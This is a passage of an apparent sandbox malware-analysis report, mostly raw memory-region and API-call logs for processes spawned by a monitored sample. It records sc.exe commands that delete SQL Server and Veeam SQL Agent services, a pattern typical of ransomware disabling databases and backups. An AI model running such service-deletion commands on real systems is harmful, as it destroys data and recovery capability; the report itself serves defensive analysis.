"private_0x00007ff6c3c6a000" filename = "" Region: id = 686 start_va = 0x7ff6c3c6e000 end_va = 0x7ff6c3c6ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3c6e000" filename = "" Region: id = 687 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 688 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 689 start_va = 0xe61de80000 end_va = 0xe61df7ffff entry_point = 0x0 region_type = private name = "private_0x000000e61de80000" filename = "" Region: id = 690 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 691 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1789 start_va = 0xe61ddf0000 end_va = 0xe61ddfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e61ddf0000" filename = "" Region: id = 1790 start_va = 0xe61de00000 end_va = 0xe61de06fff entry_point = 0x0 region_type = private name = "private_0x000000e61de00000" filename = "" Region: id = 1791 start_va = 0xe61de70000 end_va = 0xe61de70fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e61de70000" filename = "" Region: id = 1792 start_va = 0xe61df80000 end_va = 0xe61e03dfff entry_point = 0xe61df80000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1793 start_va = 0xe61e040000 end_va = 0xe61e07ffff entry_point = 0x0 region_type = private name = "private_0x000000e61e040000" filename = "" Region: id = 1794 start_va = 0xe61e080000 end_va = 0xe61e086fff entry_point = 0x0 region_type = private name = "private_0x000000e61e080000" filename = "" Region: id = 1795 start_va = 0xe61e090000 end_va = 0xe61e090fff entry_point = 0x0 region_type = private name = "private_0x000000e61e090000" filename = "" Region: id = 1796 start_va = 0xe61e0a0000 end_va = 0xe61e0a0fff entry_point = 0x0 region_type = private name = "private_0x000000e61e0a0000" filename = "" Region: id = 1797 start_va = 0xe61e130000 end_va = 0xe61e13ffff entry_point = 0x0 region_type = private name = "private_0x000000e61e130000" filename = "" Region: id = 1798 start_va = 0xe61e140000 end_va = 0xe61e2c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e61e140000" filename = "" Region: id = 1799 start_va = 0xe61e2d0000 end_va = 0xe61e450fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e61e2d0000" filename = "" Region: id = 1800 start_va = 0xe61e460000 end_va = 0xe61f85ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e61e460000" filename = "" Region: id = 1801 start_va = 0x7ff6c3b40000 end_va = 0x7ff6c3c3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3b40000" filename = "" Region: id = 1802 start_va = 0x7ff6c3c6c000 end_va = 0x7ff6c3c6dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3c6c000" filename = "" Region: id = 1803 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 1804 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1805 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1806 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1807 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1808 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1809 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1810 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1811 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1812 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1813 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1814 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Thread: id = 36 os_tid = 0xc68 Thread: id = 53 os_tid = 0xcc8 Thread: id = 154 os_tid = 0xfb4 Thread: id = 261 os_tid = 0x1144 Process: id = "36" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0xe5f9000" os_pid = "0xc6c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "19" os_parent_pid = "0xbc4" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 692 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 693 start_va = 0x2a05720000 end_va = 0x2a0573ffff entry_point = 0x0 region_type = private name = "private_0x0000002a05720000" filename = "" Region: id = 694 start_va = 0x2a05740000 end_va = 0x2a05753fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002a05740000" filename = "" Region: id = 695 start_va = 0x2a05760000 end_va = 0x2a0579ffff entry_point = 0x0 region_type = private name = "private_0x0000002a05760000" filename = "" Region: id = 696 start_va = 0x7df5ff880000 end_va = 0x7ff5ff87ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff880000" filename = "" Region: id = 697 start_va = 0x7ff6c4620000 end_va = 0x7ff6c4642fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4620000" filename = "" Region: id = 698 start_va = 0x7ff6c4643000 end_va = 0x7ff6c4643fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c4643000" filename = "" Region: id = 699 start_va = 0x7ff6c464e000 end_va = 0x7ff6c464ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c464e000" filename = "" Region: id = 700 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 701 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 702 start_va = 0x2a058f0000 end_va = 0x2a059effff entry_point = 0x0 region_type = private name = "private_0x0000002a058f0000" filename = "" Region: id = 703 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 704 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 750 start_va = 0x2a05720000 end_va = 0x2a0572ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002a05720000" filename = "" Region: id = 751 start_va = 0x2a05730000 end_va = 0x2a05736fff entry_point = 0x0 region_type = private name = "private_0x0000002a05730000" filename = "" Region: id = 752 start_va = 0x2a057a0000 end_va = 0x2a0585dfff entry_point = 0x2a057a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 753 start_va = 0x2a05860000 end_va = 0x2a0589ffff entry_point = 0x0 region_type = private name = "private_0x0000002a05860000" filename = "" Region: id = 754 start_va = 0x2a058a0000 end_va = 0x2a058a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002a058a0000" filename = "" Region: id = 755 start_va = 0x2a058b0000 end_va = 0x2a058b6fff entry_point = 0x0 region_type = private name = "private_0x0000002a058b0000" filename = "" Region: id = 756 start_va = 0x2a058c0000 end_va = 0x2a058c0fff entry_point = 0x0 region_type = private name = "private_0x0000002a058c0000" filename = "" Region: id = 757 start_va = 0x2a058d0000 end_va = 0x2a058d0fff entry_point = 0x0 region_type = private name = "private_0x0000002a058d0000" filename = "" Region: id = 758 start_va = 0x2a05ad0000 end_va = 0x2a05adffff entry_point = 0x0 region_type = private name = "private_0x0000002a05ad0000" filename = "" Region: id = 759 start_va = 0x2a05ae0000 end_va = 0x2a05c67fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002a05ae0000" filename = "" Region: id = 760 start_va = 0x2a05c70000 end_va = 0x2a05df0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002a05c70000" filename = "" Region: id = 761 start_va = 0x2a05e00000 end_va = 0x2a071fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002a05e00000" filename = "" Region: id = 762 start_va = 0x7ff6c4520000 end_va = 0x7ff6c461ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4520000" filename = "" Region: id = 763 start_va = 0x7ff6c464c000 end_va = 0x7ff6c464dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c464c000" filename = "" Region: id = 764 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 765 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 766 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 767 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 768 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 769 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 770 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 771 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 772 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 773 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 774 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 775 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Thread: id = 37 os_tid = 0xc70 Thread: id = 52 os_tid = 0xcc0 Thread: id = 55 os_tid = 0xcd4 Thread: id = 246 os_tid = 0x10dc Process: id = "37" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0xedf5000" os_pid = "0xcfc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb14" cmd_line = "sc delete \"SQLAgent$VEEAMSQL2012\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 984 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 985 start_va = 0x7435aa0000 end_va = 0x7435abffff entry_point = 0x0 region_type = private name = "private_0x0000007435aa0000" filename = "" Region: id = 986 start_va = 0x7435ac0000 end_va = 0x7435ad3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000007435ac0000" filename = "" Region: id = 987 start_va = 0x7435ae0000 end_va = 0x7435b5ffff entry_point = 0x0 region_type = private name = "private_0x0000007435ae0000" filename = "" Region: id = 988 start_va = 0x7435b60000 end_va = 0x7435b63fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000007435b60000" filename = "" Region: id = 989 start_va = 0x7435b70000 end_va = 0x7435b70fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000007435b70000" filename = "" Region: id = 990 start_va = 0x7435b80000 end_va = 0x7435b81fff entry_point = 0x0 region_type = private name = "private_0x0000007435b80000" filename = "" Region: id = 991 start_va = 0x7df5ff1d0000 end_va = 0x7ff5ff1cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff1d0000" filename = "" Region: id = 992 start_va = 0x7ff679fc0000 end_va = 0x7ff679fe2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff679fc0000" filename = "" Region: id = 993 start_va = 0x7ff679fed000 end_va = 0x7ff679fedfff entry_point = 0x0 region_type = private name = "private_0x00007ff679fed000" filename = "" Region: id = 994 start_va = 0x7ff679fee000 end_va = 0x7ff679feffff entry_point = 0x0 region_type = private name = "private_0x00007ff679fee000" filename = "" Region: id = 995 start_va = 0x7ff67ae30000 end_va = 0x7ff67ae45fff entry_point = 0x7ff67ae30000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\System32\\sc.exe" (normalized: "c:\\windows\\system32\\sc.exe") Region: id = 996 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1636 start_va = 0x7435be0000 end_va = 0x7435cdffff entry_point = 0x0 region_type = private name = "private_0x0000007435be0000" filename = "" Region: id = 1637 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1638 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5299 start_va = 0x7435aa0000 end_va = 0x7435aaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000007435aa0000" filename = "" Region: id = 5300 start_va = 0x7435ab0000 end_va = 0x7435ab6fff entry_point = 0x0 region_type = private name = "private_0x0000007435ab0000" filename = "" Region: id = 5301 start_va = 0x7435ce0000 end_va = 0x7435d9dfff entry_point = 0x7435ce0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5302 start_va = 0x7435da0000 end_va = 0x7435e1ffff entry_point = 0x0 region_type = private name = "private_0x0000007435da0000" filename = "" Region: id = 5303 start_va = 0x7435fa0000 end_va = 0x7435faffff entry_point = 0x0 region_type = private name = "private_0x0000007435fa0000" filename = "" Region: id = 5304 start_va = 0x7ff679ec0000 end_va = 0x7ff679fbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff679ec0000" filename = "" Region: id = 5305 start_va = 0x7ff679feb000 end_va = 0x7ff679fecfff entry_point = 0x0 region_type = private name = "private_0x00007ff679feb000" filename = "" Region: id = 5306 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5307 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5312 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5313 start_va = 0x7435b90000 end_va = 0x7435b96fff entry_point = 0x0 region_type = private name = "private_0x0000007435b90000" filename = "" Region: id = 5314 start_va = 0x7435e20000 end_va = 0x7435efefff entry_point = 0x7435e20000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 5315 start_va = 0x7435ba0000 end_va = 0x7435bb1fff entry_point = 0x7435ba0000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\System32\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\sc.exe.mui") Thread: id = 65 os_tid = 0xd00 [0078.143] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff67ae30000 [0078.144] __set_app_type (_Type=0x1) [0078.144] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff67ae31f00) returned 0x0 [0078.144] __wgetmainargs (in: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038, _DoWildCard=0, _StartInfo=0x7ff67ae41044 | out: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038) returned 0 [0078.144] SetThreadUILanguage (LangId=0x0) returned 0x409 [0078.253] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0078.253] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0078.253] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8 [0078.253] _wcsicmp (_String1="delete", _String2="query") returned -13 [0078.253] _wcsicmp (_String1="delete", _String2="queryex") returned -13 [0078.253] _wcsicmp (_String1="delete", _String2="start") returned -15 [0078.253] _wcsicmp (_String1="delete", _String2="pause") returned -12 [0078.253] _wcsicmp (_String1="delete", _String2="interrogate") returned -5 [0078.253] _wcsicmp (_String1="delete", _String2="control") returned 1 [0078.253] _wcsicmp (_String1="delete", _String2="continue") returned 1 [0078.253] _wcsicmp (_String1="delete", _String2="stop") returned -15 [0078.253] _wcsicmp (_String1="delete", _String2="config") returned 1 [0078.253] _wcsicmp (_String1="delete", _String2="description") returned -7 [0078.253] _wcsicmp (_String1="delete", _String2="failure") returned -2 [0078.253] _wcsicmp (_String1="delete", _String2="privs") returned -12 [0078.253] _wcsicmp (_String1="delete", _String2="failureflag") returned -2 [0078.253] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16 [0078.253] _wcsicmp (_String1="delete", _String2="sidtype") returned -15 [0078.253] _wcsicmp (_String1="delete", _String2="managedaccount") returned -9 [0078.253] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12 [0078.253] _wcsicmp (_String1="delete", _String2="qc") returned -13 [0078.253] _wcsicmp (_String1="delete", _String2="qdescription") returned -13 [0078.253] _wcsicmp (_String1="delete", _String2="qfailure") returned -13 [0078.253] _wcsicmp (_String1="delete", _String2="qprivs") returned -13 [0078.253] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13 [0078.253] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13 [0078.253] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13 [0078.253] _wcsicmp (_String1="delete", _String2="showsid") returned -15 [0078.253] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13 [0078.253] _wcsicmp (_String1="delete", _String2="qmanagedaccount") returned -13 [0078.253] _wcsicmp (_String1="delete", _String2="querylock") returned -13 [0078.253] _wcsicmp (_String1="delete", _String2="qprotection") returned -13 [0078.253] _wcsicmp (_String1="delete", _String2="lock") returned -8 [0078.254] _wcsicmp (_String1="delete", _String2="delete") returned 0 [0078.254] ResolveDelayLoadedAPI () returned 0x7ffc02114740 [0078.255] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x7435be8c20 [0078.259] OpenServiceW (hSCManager=0x7435be8c20, lpServiceName="SQLAgent$VEEAMSQL2012", dwDesiredAccess=0x10000) returned 0x0 [0078.259] GetLastError () returned 0x424 [0078.259] _ultow (in: _Dest=0x424, _Radix=901117320 | out: _Dest=0x424) returned="1060" [0078.259] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0x7ff67ae41640, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0078.261] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x7435b5f540, nSize=0x2, Arguments=0x7435b5f570 | out: lpBuffer="顠㖾t") returned 0x62 [0078.262] GetFileType (hFile=0x24) returned 0x2 [0078.262] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7435b5f4f0 | out: lpMode=0x7435b5f4f0) returned 1 [0078.269] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0x7435be9860*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x7435b5f4e8, lpReserved=0x0 | out: lpBuffer=0x7435be9860*, lpNumberOfCharsWritten=0x7435b5f4e8*=0x62) returned 1 [0078.269] LocalFree (hMem=0x7435be9860) returned 0x0 [0078.269] LocalFree (hMem=0x0) returned 0x0 [0078.269] CloseServiceHandle (hSCObject=0x7435be8c20) returned 1 [0078.270] LocalFree (hMem=0x0) returned 0x0 [0078.270] exit (_Code=1060) Thread: id = 337 os_tid = 0x12fc Process: id = "38" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0xed7a000" os_pid = "0xd04" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb14" cmd_line = "sc delete \"MSSQL\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 997 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 998 start_va = 0x675c1b0000 end_va = 0x675c1cffff entry_point = 0x0 region_type = private name = "private_0x000000675c1b0000" filename = "" Region: id = 999 start_va = 0x675c1d0000 end_va = 0x675c1e3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000675c1d0000" filename = "" Region: id = 1000 start_va = 0x675c1f0000 end_va = 0x675c26ffff entry_point = 0x0 region_type = private name = "private_0x000000675c1f0000" filename = "" Region: id = 1001 start_va = 0x675c270000 end_va = 0x675c273fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000675c270000" filename = "" Region: id = 1002 start_va = 0x675c280000 end_va = 0x675c280fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000675c280000" filename = "" Region: id = 1003 start_va = 0x675c290000 end_va = 0x675c291fff entry_point = 0x0 region_type = private name = "private_0x000000675c290000" filename = "" Region: id = 1004 start_va = 0x7df5ff4d0000 end_va = 0x7ff5ff4cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff4d0000" filename = "" Region: id = 1005 start_va = 0x7ff67aab0000 end_va = 0x7ff67aad2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67aab0000" filename = "" Region: id = 1006 start_va = 0x7ff67aadd000 end_va = 0x7ff67aadefff entry_point = 0x0 region_type = private name = "private_0x00007ff67aadd000" filename = "" Region: id = 1007 start_va = 0x7ff67aadf000 end_va = 0x7ff67aadffff entry_point = 0x0 region_type = private name = "private_0x00007ff67aadf000" filename = "" Region: id = 1008 start_va = 0x7ff67ae30000 end_va = 0x7ff67ae45fff entry_point = 0x7ff67ae30000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\System32\\sc.exe" (normalized: "c:\\windows\\system32\\sc.exe") Region: id = 1009 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" 